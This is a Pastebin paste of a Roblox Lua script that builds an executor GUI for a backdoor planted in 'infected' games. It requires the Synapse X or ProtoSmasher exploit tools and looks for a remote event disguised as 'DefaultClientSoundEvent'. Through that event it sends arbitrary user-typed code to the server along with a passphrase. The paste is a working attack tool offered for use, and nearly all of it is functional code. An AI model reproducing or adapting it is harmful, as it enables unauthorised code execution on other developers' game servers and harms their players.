Advertisement
VIPER23

Untitled

Apr 26th, 2019
365
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.20 KB | None | 0 0
  1. -- Made by Stefan#6965
  2.  
  3.  
  4. game:WaitForChild("Workspace")
  5. game:WaitForChild("ReplicatedStorage")
  6. game:WaitForChild("Lighting")
  7. game:WaitForChild("Players")
  8. game:WaitForChild("Teams")
  9. game:WaitForChild("TestService")
  10. game:WaitForChild("AdService")
  11. game:FindFirstChildOfClass("Player")
  12.  
  13. wait()
  14.  
  15. local bd = Instance.new("ScreenGui")
  16. local main = Instance.new("Frame")
  17. local exe = Instance.new("TextButton")
  18. local scriptframe = Instance.new("ScrollingFrame")
  19. local input = Instance.new("TextBox")
  20. local clear = Instance.new("TextButton")
  21. local copy = Instance.new("TextButton")
  22. local menu = Instance.new("ImageButton")
  23.  
  24. bd.Name = "bd"
  25. bd.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  26. bd.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  27.  
  28. main.Name = "main"
  29. main.Parent = bd
  30. main.BackgroundColor3 = Color3.new(1, 1, 1)
  31. main.LayoutOrder = 4
  32. main.Position = UDim2.new(0.5, -600, 0.5, -200)
  33. main.Size = UDim2.new(0, 500, 0, 408)
  34. main.Style = Enum.FrameStyle.DropShadow
  35.  
  36. exe.Name = "exe"
  37. exe.Parent = main
  38. exe.BackgroundColor3 = Color3.new(1, 1, 1)
  39. exe.BackgroundTransparency = 1
  40. exe.Position = UDim2.new(0, 0, 0.887299955, 0)
  41. exe.Size = UDim2.new(0, 148, 0, 50)
  42. exe.Font = Enum.Font.SourceSans
  43. exe.Text = "Execute"
  44. exe.TextColor3 = Color3.new(1, 1, 1)
  45. exe.TextScaled = true
  46. exe.TextSize = 14
  47. exe.TextWrapped = true
  48.  
  49. scriptframe.Name = "scriptframe"
  50. scriptframe.Parent = main
  51. scriptframe.BackgroundColor3 = Color3.new(0, 0, 0)
  52. scriptframe.BackgroundTransparency = 0.5
  53. scriptframe.Position = UDim2.new(0.00600000098, 0, 0.00240005553, 0)
  54. scriptframe.Size = UDim2.new(0, 478, 0, 332)
  55. scriptframe.CanvasSize = UDim2.new(0, 0, 500, 0)
  56.  
  57. input.Name = "input"
  58. input.Parent = scriptframe
  59. input.BackgroundColor3 = Color3.new(1, 1, 1)
  60. input.BackgroundTransparency = 1
  61. input.Position = UDim2.new(0.0146443518, 0, 4.99999987e-06, 0)
  62. input.Size = UDim2.new(0, 464, 0, 199950)
  63. input.ClearTextOnFocus = false
  64. input.Font = Enum.Font.SourceSans
  65. input.MultiLine = true
  66. input.Text = " [ INSERT SCRIPT HERE ]"
  67. input.TextColor3 = Color3.new(1, 1, 1)
  68. input.TextSize = 20
  69. input.TextWrapped = true
  70. input.TextXAlignment = Enum.TextXAlignment.Left
  71. input.TextYAlignment = Enum.TextYAlignment.Top
  72.  
  73. clear.Name = "clear"
  74. clear.Parent = main
  75. clear.BackgroundColor3 = Color3.new(1, 1, 1)
  76. clear.BackgroundTransparency = 1
  77. clear.Position = UDim2.new(0.335999995, 0, 0.887299955, 0)
  78. clear.Size = UDim2.new(0, 148, 0, 50)
  79. clear.Font = Enum.Font.SourceSans
  80. clear.Text = "Clear"
  81. clear.TextColor3 = Color3.new(1, 1, 1)
  82. clear.TextScaled = true
  83. clear.TextSize = 14
  84. clear.TextWrapped = true
  85.  
  86. copy.Name = "copy"
  87. copy.Parent = main
  88. copy.BackgroundColor3 = Color3.new(1, 1, 1)
  89. copy.BackgroundTransparency = 1
  90. copy.Position = UDim2.new(0.674000025, 0, 0.887299955, 0)
  91. copy.Size = UDim2.new(0, 148, 0, 50)
  92. copy.Font = Enum.Font.SourceSans
  93. copy.Text = "Copy"
  94. copy.TextColor3 = Color3.new(1, 1, 1)
  95. copy.TextScaled = true
  96. copy.TextSize = 14
  97. copy.TextWrapped = true
  98.  
  99. menu.Name = "menu"
  100. menu.Parent = bd
  101. menu.BackgroundColor3 = Color3.new(0, 0, 0)
  102. menu.BackgroundTransparency = 0.77999997138977
  103. menu.Position = UDim2.new(0, 0, 0.850122869, 0)
  104. menu.Size = UDim2.new(0, 79, 0, 74)
  105. menu.Image = "rbxassetid://2905949777"
  106. menu.ImageTransparency = 0.30000001192093
  107.  
  108.  
  109.  
  110.  
  111.  
  112. local exploit = nil
  113. if PROTOSMASHER_LOADED then
  114. exploit = "ProtoSmaher"
  115. elseif syn then
  116. exploit = "Synapse X"
  117. else
  118. warn("This backdoor supports olny Synapse X and ProtoSmasher!")
  119. return "RIP"
  120. end
  121. if not game.ReplicatedStorage.DefaultSoundEvents["DefaultClientSoundEvent"] then warn("Game not infected!") wait() return end
  122. local event = game:GetService("ReplicatedStorage"):FindFirstChild("DefaultSoundEvents"):FindFirstChild("DefaultClientSoundEvent")
  123. local gui = game.Players.LocalPlayer.PlayerGui:FindFirstChild("bd")
  124. local ts = game:GetService("TweenService")
  125. local TweenMain = TweenInfo.new(1,Enum.EasingStyle.Quart,Enum.EasingDirection.Out,0,false,0)
  126. local mainopen = {Position = UDim2.new(0.5,-600,0.5,-200)}
  127. local mainclosed = {Position = UDim2.new(0,-500,0.5,-200)}
  128. local OpenTween = ts:Create(gui.main,TweenMain,mainopen)
  129. local ClosedTween = ts:Create(gui.main,TweenMain,mainclosed)
  130. local IsGuiOpen = false
  131. gui.main.Position = UDim2.new(0,-500,0.5,-200)
  132. gui.menu.MouseButton1Click:Connect(function()
  133. if IsGuiOpen == false then
  134. OpenTween:Play()
  135. IsGuiOpen = true
  136. else
  137. ClosedTween:Play()
  138. IsGuiOpen = false
  139. end
  140. end)
  141.  
  142.  
  143. gui.main.exe.MouseButton1Click:Connect(function()
  144. if IsGuiOpen == true then
  145. event:FireServer(gui.main.scriptframe.input.Text,"curcubeu")
  146. end
  147. end)
  148.  
  149. gui.main.clear.MouseButton1Click:Connect(function()
  150. if IsGuiOpen == true then
  151. gui.main.scriptframe.input.Text = ""
  152. end
  153. end)
  154.  
  155. gui.main.copy.MouseButton1Click:Connect(function()
  156. if IsGuiOpen == true then
  157. if exploit == "Synapse X" then
  158. syn.write_clipboard(gui.main.scriptframe.input.Text)
  159. elseif exploit == "ProtoSmasher" then
  160. setclipboard(gui.main.scriptframe.input.Text)
  161. else
  162. game.Players.LocalPlayer:Kick("Error at clipboard.")
  163. end
  164. end
  165. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement